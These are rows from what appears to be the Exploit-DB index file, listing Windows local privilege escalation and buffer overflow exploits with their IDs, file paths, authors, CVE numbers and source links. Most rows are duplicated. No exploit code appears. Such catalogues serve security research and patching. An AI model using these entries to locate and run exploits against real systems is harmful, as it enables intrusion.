47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,,2019-08-13,2019-08-13,0,,,,,,https://github.com/AbsoZed/SteamPrivEsc/blob/d51c5bc73c3db87bcdb6bb8e3480483ebb28e8d4/SteamPwn.ps1 47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,,2019-08-13,2019-08-13,0,,,,,,https://github.com/AbsoZed/SteamPrivEsc/blob/d51c5bc73c3db87bcdb6bb8e3480483ebb28e8d4/SteamPwn.ps1
16633,exploits/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Local Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows,,2010-11-11,2011-03-10,1,OSVDB-64580,"Metasploit Framework (MSF)",,,, 16633,exploits/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Local Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows,,2010-11-11,2011-03-10,1,OSVDB-64580,"Metasploit Framework (MSF)",,,,
30032,exploits/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Local Buffer Overflow (SEH) (DEP Bypass + ROP)",2013-12-04,metacom,local,windows,,2013-12-06,2016-09-04,1,CVE-2013-7186;OSVDB-101253,,,http://www.exploit-db.com/screenshots/idlt30500/screen-shot-2013-12-06-at-113504.png,, 30032,exploits/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Local Buffer Overflow (SEH) (DEP Bypass + ROP)",2013-12-04,metacom,local,windows,,2013-12-06,2016-09-04,1,CVE-2013-7186;OSVDB-101253,,,http://www.exploit-db.com/screenshots/idlt30500/screen-shot-2013-12-06-at-113504.png,,
51341,exploits/windows/local/51341.txt,"Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation",2023-04-08,"TOUHAMI Kasbaoui",local,windows,,2023-04-08,2023-04-08,0,,,,,,
45401,exploits/windows/local/45401.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (1)",2018-09-13,"Parvez Anwar",local,windows,,2018-09-13,2019-02-13,1,,Local,,,http://www.exploit-db.comSTOPzillaAntiMalware.msi, 45401,exploits/windows/local/45401.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (1)",2018-09-13,"Parvez Anwar",local,windows,,2018-09-13,2019-02-13,1,,Local,,,http://www.exploit-db.comSTOPzillaAntiMalware.msi,
45496,exploits/windows/local/45496.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)",2018-09-15,"Ivan Ivanovic",local,windows,,2019-03-04,2019-03-11,0,,,,,, 45496,exploits/windows/local/45496.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)",2018-09-15,"Ivan Ivanovic",local,windows,,2019-03-04,2019-03-11,0,,,,,,
18186,exploits/windows/local/18186.rb,"StoryBoard Quick 6 - Local Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",local,windows,,2011-12-01,2011-12-01,0,OSVDB-77421;CVE-2011-5172,"Metasploit Framework (MSF)",,,,http://security-assessment.com/files/documents/advisory/StoryBoard_Quick_6-Stack_Buffer_Overflow.pdf 18186,exploits/windows/local/18186.rb,"StoryBoard Quick 6 - Local Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",local,windows,,2011-12-01,2011-12-01,0,OSVDB-77421;CVE-2011-5172,"Metasploit Framework (MSF)",,,,http://security-assessment.com/files/documents/advisory/StoryBoard_Quick_6-Stack_Buffer_Overflow.pdf

Can't render this file because it is too large.